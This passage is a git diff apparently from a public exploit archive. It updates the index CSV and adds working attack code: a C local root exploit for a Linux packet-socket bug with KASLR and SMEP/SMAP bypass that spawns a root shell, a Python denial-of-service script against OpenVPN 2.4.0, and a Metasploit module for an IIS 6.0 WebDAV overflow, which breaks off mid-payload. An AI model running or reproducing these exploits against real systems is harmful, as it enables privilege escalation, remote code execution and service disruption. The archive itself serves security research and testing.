diff --git a/files.csv b/files.csv index 5d296f62e..95b9851b8 100644 --- a/files.csv +++ b/files.csv @@ -5490,6 +5490,7 @@ id,file,description,date,author,platform,type,port 41983,platforms/android/dos/41983.txt,"LG G4 MRA58K - 'mkvparser::Block::Block' Heap Buffer Overflows",2017-05-09,"Google Security Research",android,dos,0 41984,platforms/multiple/dos/41984.txt,"wolfSSL 3.10.2 - x509 Certificate Text Parsing Off-by-One",2017-05-09,Talos,multiple,dos,0 41991,platforms/linux/dos/41991.py,"SAP SAPCAR 721.510 - Heap-Based Buffer Overflow",2017-05-10,"Core Security",linux,dos,0 +41993,platforms/multiple/dos/41993.py,"OpenVPN 2.4.0 - Unauthenticated Denial of Service",2017-05-11,QuarksLab,multiple,dos,1194 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -8295,7 +8296,7 @@ id,file,description,date,author,platform,type,port 31151,platforms/linux/local/31151.c,"GKrellM GKrellWeather 0.2.7 Plugin - Local Stack Based Buffer Overflow",2008-02-12,forensec,linux,local,0 31182,platforms/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",windows,local,0 31346,platforms/linux/local/31346.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write Exploit (2)",2014-02-02,saelo,linux,local,0 -31347,platforms/lin_x86/local/31347.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Privilege Escalation (3)",2014-02-02,rebel,lin_x86,local,0 +31347,platforms/lin_x86-64/local/31347.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Privilege Escalation (3)",2014-02-02,rebel,lin_x86-64,local,0 31386,platforms/windows/local/31386.rb,"Adrenalin Player 2.2.5.3 - '.m3u' Buffer Overflow (SEH) ASLR + DEP Bypass",2014-02-04,"Muhamad Fadzil Ramli",windows,local,0 31460,platforms/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Privilege Escalation",2014-02-06,LiquidWorm,windows,local,0 31524,platforms/windows/local/31524.rb,"Publish-It 3.6d - '.pui' Buffer Overflow (SEH)",2014-02-08,"Muhamad Fadzil Ramli",windows,local,0 @@ -8978,6 +8979,7 @@ id,file,description,date,author,platform,type,port 41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0 41972,platforms/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",windows,local,0 41973,platforms/linux/local/41973.txt,"Xen 64bit PV Guest - pagetable use-after-type-change Breakout",2017-05-08,"Google Security Research",linux,local,0 +41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0 - Packet Socket Local root Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -15467,7 +15469,7 @@ id,file,description,date,author,platform,type,port 41694,platforms/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote,0 41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0 41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0 -41987,platforms/windows/remote/41987.c,"Microsoft Windows - SrvOs2FeaToNt SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0 +41987,platforms/windows/remote/41987.py,"Microsoft Windows - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0 41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0 41719,platforms/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit)",2017-03-24,Metasploit,hardware,remote,80 41720,platforms/python/remote/41720.rb,"Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",python,remote,0 @@ -15496,6 +15498,7 @@ id,file,description,date,author,platform,type,port 41975,platforms/windows/remote/41975.txt,"Microsoft Security Essentials / SCEP (Microsoft Windows 8/8.1/10 / Windows Server) - 'MsMpEng' Remotely Exploitable Type Confusion",2017-05-09,"Google Security Research",windows,remote,0 41978,platforms/multiple/remote/41978.py,"Oracle GoldenGate 12.1.2.0.0 - Unauthenticated Remote Code Execution",2017-05-09,"Silent Signal",multiple,remote,0 41980,platforms/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,Metasploit,python,remote,80 +41992,platforms/windows/remote/41992.rb,"Microsoft IIS WebDav - ScStoragePathFromUrl Overflow (Metasploit)",2017-05-11,Metasploit,windows,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 diff --git a/platforms/lin_x86/local/31347.c b/platforms/lin_x86-64/local/31347.c similarity index 100% rename from platforms/lin_x86/local/31347.c rename to platforms/lin_x86-64/local/31347.c diff --git a/platforms/linux/local/41994.c b/platforms/linux/local/41994.c new file mode 100755 index 000000000..05328d5da --- /dev/null +++ b/platforms/linux/local/41994.c @@ -0,0 +1,497 @@ +// A proof-of-concept local root exploit for CVE-2017-7308. +// Includes a SMEP & SMAP bypass. +// Tested on 4.8.0-41-generic Ubuntu kernel. +// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308 +// +// Usage: +// user@ubuntu:~$ uname -a +// Linux ubuntu 4.8.0-41-generic #44~16.04.1-Ubuntu SMP Fri Mar 3 ... +// user@ubuntu:~$ gcc pwn.c -o pwn +// user@ubuntu:~$ ./pwn +// [.] starting +// [.] namespace sandbox set up +// [.] KASLR bypass enabled, getting kernel addr +// [.] done, kernel text: ffffffff87000000 +// [.] commit_creds: ffffffff870a5cf0 +// [.] prepare_kernel_cred: ffffffff870a60e0 +// [.] native_write_cr4: ffffffff87064210 +// [.] padding heap +// [.] done, heap is padded +// [.] SMEP & SMAP bypass enabled, turning them off +// [.] done, SMEP & SMAP should be off now +// [.] executing get root payload 0x401516 +// [.] done, should be root now +// [.] checking if we got root +// [+] got r00t ^_^ +// root@ubuntu:/home/user# cat /etc/shadow +// root:!:17246:0:99999:7::: +// daemon:*:17212:0:99999:7::: +// bin:*:17212:0:99999:7::: +// ... +// +// Andrey Konovalov + +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include +#include + +#define ENABLE_KASLR_BYPASS 1 +#define ENABLE_SMEP_SMAP_BYPASS 1 + +// Will be overwritten if ENABLE_KASLR_BYPASS +unsigned long KERNEL_BASE = 0xffffffff81000000ul; + +// Kernel symbol offsets +#define COMMIT_CREDS 0xa5cf0ul +#define PREPARE_KERNEL_CRED 0xa60e0ul +#define NATIVE_WRITE_CR4 0x64210ul + +// Should have SMEP and SMAP bits disabled +#define CR4_DESIRED_VALUE 0x407f0ul + +#define KMALLOC_PAD 512 +#define PAGEALLOC_PAD 1024 + +// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * * + +typedef uint32_t u32; + +// $ pahole -C hlist_node ./vmlinux +struct hlist_node { + struct hlist_node * next; /* 0 8 */ + struct hlist_node * * pprev; /* 8 8 */ +}; + +// $ pahole -C timer_list ./vmlinux +struct timer_list { + struct hlist_node entry; /* 0 16 */ + long unsigned int expires; /* 16 8 */ + void (*function)(long unsigned int); /* 24 8 */ + long unsigned int data; /* 32 8 */ + u32 flags; /* 40 4 */ + int start_pid; /* 44 4 */ + void * start_site; /* 48 8 */ + char start_comm[16]; /* 56 16 */ +}; + +// packet_sock->rx_ring->prb_bdqc->retire_blk_timer +#define TIMER_OFFSET 896 + +// pakcet_sock->xmit +#define XMIT_OFFSET 1304 + +// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * * + +void packet_socket_rx_ring_init(int s, unsigned int block_size, + unsigned int frame_size, unsigned int block_nr, + unsigned int sizeof_priv, unsigned int timeout) { + int v = TPACKET_V3; + int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v)); + if (rv < 0) { + perror("[-] setsockopt(PACKET_VERSION)"); + exit(EXIT_FAILURE); + } + + struct tpacket_req3 req; + memset(&req, 0, sizeof(req)); + req.tp_block_size = block_size; + req.tp_frame_size = frame_size; + req.tp_block_nr = block_nr; + req.tp_frame_nr = (block_size * block_nr) / frame_size; + req.tp_retire_blk_tov = timeout; + req.tp_sizeof_priv = sizeof_priv; + req.tp_feature_req_word = 0; + + rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req)); + if (rv < 0) { + perror("[-] setsockopt(PACKET_RX_RING)"); + exit(EXIT_FAILURE); + } +} + +int packet_socket_setup(unsigned int block_size, unsigned int frame_size, + unsigned int block_nr, unsigned int sizeof_priv, int timeout) { + int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); + if (s < 0) { + perror("[-] socket(AF_PACKET)"); + exit(EXIT_FAILURE); + } + + packet_socket_rx_ring_init(s, block_size, frame_size, block_nr, + sizeof_priv, timeout); + + struct sockaddr_ll sa; + memset(&sa, 0, sizeof(sa)); + sa.sll_family = PF_PACKET; + sa.sll_protocol = htons(ETH_P_ALL); + sa.sll_ifindex = if_nametoindex("lo"); + sa.sll_hatype = 0; + sa.sll_pkttype = 0; + sa.sll_halen = 0; + + int rv = bind(s, (struct sockaddr *)&sa, sizeof(sa)); + if (rv < 0) { + perror("[-] bind(AF_PACKET)"); + exit(EXIT_FAILURE); + } + + return s; +} + +void packet_socket_send(int s, char *buffer, int size) { + struct sockaddr_ll sa; + memset(&sa, 0, sizeof(sa)); + sa.sll_ifindex = if_nametoindex("lo"); + sa.sll_halen = ETH_ALEN; + + if (sendto(s, buffer, size, 0, (struct sockaddr *)&sa, + sizeof(sa)) < 0) { + perror("[-] sendto(SOCK_RAW)"); + exit(EXIT_FAILURE); + } +} + +void loopback_send(char *buffer, int size) { + int s = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW); + if (s == -1) { + perror("[-] socket(SOCK_RAW)"); + exit(EXIT_FAILURE); + } + + packet_socket_send(s, buffer, size); +} + +int packet_sock_kmalloc() { + int s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)); + if (s == -1) { + perror("[-] socket(SOCK_DGRAM)"); + exit(EXIT_FAILURE); + } + return s; +} + +void packet_sock_timer_schedule(int s, int timeout) { + packet_socket_rx_ring_init(s, 0x1000, 0x1000, 1, 0, timeout); +} + +void packet_sock_id_match_trigger(int s) { + char buffer[16]; + packet_socket_send(s, &buffer[0], sizeof(buffer)); +} + +// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * * + +#define ALIGN(x, a) __ALIGN_KERNEL((x), (a)) +#define __ALIGN_KERNEL(x, a) __ALIGN_KERNEL_MASK(x, (typeof(x))(a) - 1) +#define __ALIGN_KERNEL_MASK(x, mask) (((x) + (mask)) & ~(mask)) + +#define V3_ALIGNMENT (8) +#define BLK_HDR_LEN (ALIGN(sizeof(struct tpacket_block_desc), V3_ALIGNMENT)) + +#define ETH_HDR_LEN sizeof(struct ethhdr) +#define IP_HDR_LEN sizeof(struct iphdr) +#define UDP_HDR_LEN sizeof(struct udphdr) + +#define UDP_HDR_LEN_FULL (ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN) + +int oob_setup(int offset) { + unsigned int maclen = ETH_HDR_LEN; + unsigned int netoff = TPACKET_ALIGN(TPACKET3_HDRLEN + + (maclen < 16 ? 16 : maclen)); + unsigned int macoff = netoff - maclen; + unsigned int sizeof_priv = (1u<<31) + (1u<<30) + + 0x8000 - BLK_HDR_LEN - macoff + offset; + return packet_socket_setup(0x8000, 2048, 2, sizeof_priv, 100); +} + +void oob_write(char *buffer, int size) { + loopback_send(buffer, size); +} + +void oob_timer_execute(void *func, unsigned long arg) { + oob_setup(2048 + TIMER_OFFSET - 8); + + int i; + for (i = 0; i < 32; i++) { + int timer = packet_sock_kmalloc(); + packet_sock_timer_schedule(timer, 1000); + } + + char buffer[2048]; + memset(&buffer[0], 0, sizeof(buffer)); + + struct timer_list *timer = (struct timer_list *)&buffer[8]; + timer->function = func; + timer->data = arg; + timer->flags = 1; + + oob_write(&buffer[0] + 2, sizeof(*timer) + 8 - 2); + + sleep(1); +} + +void oob_id_match_execute(void *func) { + int s = oob_setup(2048 + XMIT_OFFSET - 64); + + int ps[32]; + + int i; + for (i = 0; i < 32; i++) + ps[i] = packet_sock_kmalloc(); + + char buffer[2048]; + memset(&buffer[0], 0, 2048); + + void **xmit = (void **)&buffer[64]; + *xmit = func; + + oob_write((char *)&buffer[0] + 2, sizeof(*xmit) + 64 - 2); + + for (i = 0; i < 32; i++) + packet_sock_id_match_trigger(ps[i]); +} + +// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * * + +void kmalloc_pad(int count) { + int i; + for (i = 0; i < count; i++) + packet_sock_kmalloc(); +} + +void pagealloc_pad(int count) { + packet_socket_setup(0x8000, 2048, count, 0, 100); +} + +// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * * + +typedef unsigned long __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); +typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); + +void get_root_payload(void) { + ((_commit_creds)(KERNEL_BASE + COMMIT_CREDS))( + ((_prepare_kernel_cred)(KERNEL_BASE + PREPARE_KERNEL_CRED))(0) + ); +} + +// * * * * * * * * * * * * * Simple KASLR bypass * * * * * * * * * * * * * * * + +#define SYSLOG_ACTION_READ_ALL 3 +#define SYSLOG_ACTION_SIZE_BUFFER 10 + +unsigned long get_kernel_addr() { + int size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0); + if (size == -1) { + perror("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)"); + exit(EXIT_FAILURE); + } + + size = (size / getpagesize() + 1) * getpagesize(); + char *buffer = (char *)mmap(NULL, size, PROT_READ|PROT_WRITE, + MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); + + size = klogctl(SYSLOG_ACTION_READ_ALL, &buffer[0], size); + if (size == -1) { + perror("[-] klogctl(SYSLOG_ACTION_READ_ALL)"); + exit(EXIT_FAILURE); + } + + const char *needle1 = "Freeing SMP"; + char *substr = (char *)memmem(&buffer[0], size, needle1, strlen(needle1)); + if (substr == NULL) { + fprintf(stderr, "[-] substring '%s' not found in dmesg\n", needle1); + exit(EXIT_FAILURE); + } + + for (size = 0; substr[size] != '\n'; size++); + + const char *needle2 = "ffff"; + substr = (char *)memmem(&substr[0], size, needle2, strlen(needle2)); + if (substr == NULL) { + fprintf(stderr, "[-] substring '%s' not found in dmesg\n", needle2); + exit(EXIT_FAILURE); + } + + char *endptr = &substr[16]; + unsigned long r = strtoul(&substr[0], &endptr, 16); + + r &= 0xfffffffffff00000ul; + r -= 0x1000000ul; + + return r; +} + +// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * * + +void exec_shell() { + char *shell = "/bin/bash"; + char *args[] = {shell, "-i", NULL}; + execve(shell, args, NULL); +} + +void fork_shell() { + pid_t rv; + + rv = fork(); + if (rv == -1) { + perror("[-] fork()"); + exit(EXIT_FAILURE); + } + + if (rv == 0) { + exec_shell(); + } +} + +bool is_root() { + // We can't simple check uid, since we're running inside a namespace + // with uid set to 0. Try opening /etc/shadow instead. + int fd = open("/etc/shadow", O_RDONLY); + if (fd == -1) + return false; + close(fd); + return true; +} + +void check_root() { + printf("[.] checking if we got root\n"); + + if (!is_root()) { + printf("[-] something went wrong =(\n"); + return; + } + + printf("[+] got r00t ^_^\n"); + + // Fork and exec instead of just doing the exec to avoid potential + // memory corruptions when closing packet sockets. + fork_shell(); +} + +bool write_file(const char* file, const char* what, ...) { + char buf[1024]; + va_list args; + va_start(args, what); + vsnprintf(buf, sizeof(buf), what, args); + va_end(args); + buf[sizeof(buf) - 1] = 0; + int len = strlen(buf); + + int fd = open(file, O_WRONLY | O_CLOEXEC); + if (fd == -1) + return false; + if (write(fd, buf, len) != len) { + close(fd); + return false; + } + close(fd); + return true; +} + +void setup_sandbox() { + int real_uid = getuid(); + int real_gid = getgid(); + + if (unshare(CLONE_NEWUSER) != 0) { + perror("[-] unshare(CLONE_NEWUSER)"); + exit(EXIT_FAILURE); + } + + if (unshare(CLONE_NEWNET) != 0) { + perror("[-] unshare(CLONE_NEWUSER)"); + exit(EXIT_FAILURE); + } + + if (!write_file("/proc/self/setgroups", "deny")) { + perror("[-] write_file(/proc/self/set_groups)"); + exit(EXIT_FAILURE); + } + if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)){ + perror("[-] write_file(/proc/self/uid_map)"); + exit(EXIT_FAILURE); + } + if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) { + perror("[-] write_file(/proc/self/gid_map)"); + exit(EXIT_FAILURE); + } + + cpu_set_t my_set; + CPU_ZERO(&my_set); + CPU_SET(0, &my_set); + if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) { + perror("[-] sched_setaffinity()"); + exit(EXIT_FAILURE); + } + + if (system("/sbin/ifconfig lo up") != 0) { + perror("[-] system(/sbin/ifconfig lo up)"); + exit(EXIT_FAILURE); + } +} + +int main() { + printf("[.] starting\n"); + + setup_sandbox(); + + printf("[.] namespace sandbox set up\n"); + +#if ENABLE_KASLR_BYPASS + printf("[.] KASLR bypass enabled, getting kernel addr\n"); + KERNEL_BASE = get_kernel_addr(); + printf("[.] done, kernel text: %lx\n", KERNEL_BASE); +#endif + + printf("[.] commit_creds: %lx\n", KERNEL_BASE + COMMIT_CREDS); + printf("[.] prepare_kernel_cred: %lx\n", KERNEL_BASE + PREPARE_KERNEL_CRED); + +#if ENABLE_SMEP_SMAP_BYPASS + printf("[.] native_write_cr4: %lx\n", KERNEL_BASE + NATIVE_WRITE_CR4); +#endif + + printf("[.] padding heap\n"); + kmalloc_pad(KMALLOC_PAD); + pagealloc_pad(PAGEALLOC_PAD); + printf("[.] done, heap is padded\n"); + +#if ENABLE_SMEP_SMAP_BYPASS + printf("[.] SMEP & SMAP bypass enabled, turning them off\n"); + oob_timer_execute((void *)(KERNEL_BASE + NATIVE_WRITE_CR4), CR4_DESIRED_VALUE); + printf("[.] done, SMEP & SMAP should be off now\n"); +#endif + + printf("[.] executing get root payload %p\n", &get_root_payload); + oob_id_match_execute((void *)&get_root_payload); + printf("[.] done, should be root now\n"); + + check_root(); + + while (1) sleep(1000); + + return 0; +} \ No newline at end of file diff --git a/platforms/multiple/dos/41993.py b/platforms/multiple/dos/41993.py new file mode 100755 index 000000000..c08b5ed18 --- /dev/null +++ b/platforms/multiple/dos/41993.py @@ -0,0 +1,100 @@ +#!/usr/bin/env python3 +''' +$ ./dos_server.py & +$ sudo ./openvpn-2.4.0/src/openvpn/openvpn conf/server-tls.conf +... +Fri Feb 24 10:19:19 2017 192.168.149.1:64249 TLS: Initial packet from [AF_INET]192.168.149.1:64249, sid=9a6c48a6 1467f5e1 +Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Assertion failed at ssl.c:3711 (buf_copy(in, buf)) +Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Exiting due to fatal error +Fri Feb 24 10:19:19 2017 192.168.149.1:64249 /sbin/route del -net 10.8.0.0 netmask 255.255.255.0 +Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Closing TUN/TAP interface Fri Feb 24 10:19:19 2017 192.168.149.1:64249 /sbin/ifconfig tun0 0.0.0.0 +''' + +import binascii +import os +import socket +from construct import * +HOST, PORT = "192.168.0.1", 1194 + +SessionID = Bytes(8) + +PControlV1 = Struct( + "packet_id" / Int32ub, + "data" / GreedyBytes +) + +PAckV1 = Struct( + "remote_session_id" / SessionID +) + +PControlHardResetClientV2 = Struct( + "packet_id" / Int32ub +) + +PControlHardResetServerV2 = Struct( + "remote_session_id" / SessionID, + "packet_id" / Int32ub +) + +OpenVPNPacket = Struct( + EmbeddedBitStruct( + "opcode" / Enum(BitsInteger(5), + P_CONTROL_HARD_RESET_CLIENT_V1=1, + P_CONTROL_HARD_RESET_SERVER_V1=2, + P_CONTROL_HARD_RESET_CLIENT_V2=7, + P_CONTROL_HARD_RESET_SERVER_V2=8, + P_CONTROL_SOFT_RESET_V1=3, + P_CONTROL_V1=4, + P_ACK_V1=5, + P_DATA_V1=6), + "key_id" / BitsInteger(3) + ), + "session_id" / SessionID, + "ack_packets" / PrefixedArray(Int8ub, Int32ub), + Embedded(Switch(this.opcode, + { + "P_CONTROL_V1": PControlV1, + "P_ACK_V1": PAckV1, + "P_CONTROL_HARD_RESET_CLIENT_V2": PControlHardResetClientV2, + "P_CONTROL_HARD_RESET_SERVER_V2": PControlHardResetServerV2 + })) +) +def main(): + session_id = os.urandom(8) + + sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + reset_client = OpenVPNPacket.build({ + "opcode": "P_CONTROL_HARD_RESET_CLIENT_V2", + "key_id": 0, + "session_id": session_id, + "ack_packets": [], + "packet_id": 0}) + + sock.sendto(reset_client, (HOST, PORT)) + + data, addr = sock.recvfrom(8192) + reset_server = OpenVPNPacket.parse(data) + + remote_session_id = reset_server.session_id + + # ack server packet + ack_packet = OpenVPNPacket.build({ + "opcode": "P_ACK_V1", + "key_id": 0, + "session_id": session_id, + "ack_packets": [reset_server.packet_id], + "remote_session_id": remote_session_id + }) + sock.sendto(ack_packet, (HOST, PORT)) + + control_packet = OpenVPNPacket.build({ + "opcode": "P_CONTROL_V1", + "key_id": 0, + "session_id": session_id, + "ack_packets": [], + "packet_id": 1, + "data": b"a" * 2048}) + sock.sendto(control_packet, (HOST, PORT)) + +if __name__ == '__main__': + main() diff --git a/platforms/windows/remote/41987.c b/platforms/windows/remote/41987.py similarity index 100% rename from platforms/windows/remote/41987.c rename to platforms/windows/remote/41987.py diff --git a/platforms/windows/remote/41992.rb b/platforms/windows/remote/41992.rb new file mode 100755 index 000000000..d3dd8ef88 --- /dev/null +++ b/platforms/windows/remote/41992.rb @@ -0,0 +1,178 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ManualRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => ' Microsoft IIS WebDav ScStoragePathFromUrl Overflow', + 'Description' => %q{ + Buffer overflow in the ScStoragePathFromUrl function + in the WebDAV service in Internet Information Services (IIS) 6.0 + in Microsoft Windows Server 2003 R2 allows remote attackers to + execute arbitrary code via a long header beginning with + "If: + [ + 'Zhiniang Peng', # Original author + 'Chen Wu', # Original author + 'Dominic Chell ', # metasploit module + 'firefart', # metasploit module + 'zcgonvh ', # metasploit module + 'Rich Whitcroft' # metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2017-7269' ], + [ 'BID', '97127' ], + [ 'URL', 'https://github.com/edwardz246003/IIS_exploit' ], + [ 'URL', 'https://0patch.blogspot.com/2017/03/0patching-immortal-cve-2017-7269.html' ] + ], + 'Privileged' => false, + 'Payload' => + { + 'Space' => 2000, + 'BadChars' => "\x00", + 'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed, + 'DisableNops' => 'True', + 'EncoderOptions' => + { + 'BufferRegister' => 'ESI', + } + }, + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + 'PrependMigrate' => true, + }, + 'Targets' => + [ + [ + 'Microsoft Windows Server 2003 R2 SP2', + { + 'Platform' => 'win', + }, + ], + ], + 'Platform' => 'win', + 'DisclosureDate' => 'Mar 26 2017', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [ true, 'Path of IIS 6 web application', '/']), + OptInt.new('MINPATHLENGTH', [ true, 'Start of physical path brute force', 3 ]), + OptInt.new('MAXPATHLENGTH', [ true, 'End of physical path brute force', 60 ]), + ]) + end + + def min_path_len + datastore['MINPATHLENGTH'] + end + + def max_path_len + datastore['MAXPATHLENGTH'] + end + + def supports_webdav?(headers) + if headers['MS-Author-Via'] == 'DAV' || + headers['DASL'] == '' || + headers['DAV'] =~ /^[1-9]+(,\s+[1-9]+)?$/ || + headers['Public'] =~ /PROPFIND/ || + headers['Allow'] =~ /PROPFIND/ + return true + else + return false + end + end + + def check + res = send_request_cgi({ + 'uri' => target_uri.path, + 'method' => 'OPTIONS' + }) + if res && res.headers['Server'].include?('IIS/6.0') && supports_webdav?(res.headers) + return Exploit::CheckCode::Vulnerable + elsif res && supports_webdav?(res.headers) + return Exploit::CheckCode::Detected + elsif res.nil? + return Exploit::CheckCode::Unknown + else + return Exploit::CheckCode::Safe + end + end + + def exploit + # extract the local servername and port from a PROPFIND request + # these need to be the values from the backend server + # if testing a reverse proxy setup, these values differ + # from RHOST and RPORT but can be extracted this way + vprint_status("Extracting ServerName and Port") + res = send_request_raw( + 'method' => 'PROPFIND', + 'headers' => { + 'Content-Length' => 0 + }, + 'uri' => target_uri.path + ) + fail_with(Failure::BadConfig, "Server did not respond correctly to WebDAV request") if(res.nil? || res.code != 207) + + xml = res.get_xml_document + url = URI.parse(xml.at("//a:response//a:href").text) + server_name = url.hostname + server_port = url.port + server_scheme = url.scheme + + http_host = "#{server_scheme}://#{server_name}:#{server_port}" + vprint_status("Using http_host #{http_host}") + + min_path_len.upto(max_path_len) do |path_len| + vprint_status("Trying path length of #{path_len}...") + + begin + buf1 = "<#{http_host}/" + buf1 << rand_text_alpha(114 - path_len) + buf1 << "\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac" + buf1 << ">" + buf1 << " (Not ) <#{http_host}/" + buf1 << rand_text_alpha(114 - path_len) + buf1 << 